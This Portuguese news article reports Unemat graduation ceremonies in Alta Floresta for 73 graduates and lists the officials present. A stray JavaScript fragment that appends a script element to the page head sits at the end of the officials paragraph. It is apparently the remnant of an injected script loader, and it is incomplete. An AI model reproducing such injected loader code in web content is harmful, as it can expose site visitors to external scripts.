Capa / Cidades / Unemat realiza colações de grau para 73 acadêmicos em Alta Floresta

Unemat realiza colações de grau para 73 acadêmicos em Alta Floresta

formatura-unemat1Da Redação com Assessoria

A Universidade do Estado de Mato Grosso está durante este mês de outubro e ainda em novembro realizando as cerimônias de colação de grau dos formandos referente ao primeiro semestre letivo de 2016. Nesta semana foram realizadas cerimônias nos câmpus de Alta Floresta, 26, Colíder e Nova Xavantina, 27, quando cerca de 200 acadêmicos concluíram os cursos superiores.

As colações de grau desta semana foram conduzidas pela reitora Ana Maria Di Renzo e pelo vice-reitor Ariel Lopes Torres. A reitora destaca que o momento de formatura é a razão principal de ser da Universidade, que foi fundada para interiorizar o ensino superior em Mato Grosso e ao logo de quase quatro décadas vem contribuindo para o desenvolvimento deste Estado.

Em Alta Floresta realizou-se a cerimônia de Colação de Grau Unificada das turmas de Licenciatura Plena em Ciências Biológicas, Bacharelado em Agronomia e Bacharelado em Engenharia Florestal. A reitora conferiu grau a 73 novos profissionais nas dependências do Gold Eventos, em oportunidade quando cerca de mil pessoas da sociedade compareceram a cerimônia.

Além da reitora, compuseram a mesa de autoridades o professor Alexandre Gonçalves Porto, pró-reitor de extensão e cultura, professor Luiz Fernando Caldeira Ribeiro, diretor de unidade regionalizada político-pedagógico e financeiro do câmpus de Alta Floresta, Cristiano Bensone, diretor de unidade regionalizada administrativa do câmpus de Alta Floresta, professor Edgley Pereira da Silva, diretor da Faculdade de Ciências Biológicas e Agrárias, professor Getúlio de Freitas Seben Júnior coordenador do Curso de Bacharelado em Agronomia, professor Humberto Massahiro Nanaka, coordenador do Curso de Bacharelado em Direito, professor Wescley Viana Evangelista coordenador do Curso de Bacharelado em Engenharia Florestal, professora Marla Leci Wheis, Coordenadora do Curso de Bacharelado e Licenciatura Plena em Ciências Biológicas, e Clades Zimmermann, supervisora de Apoio Acadêmico.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top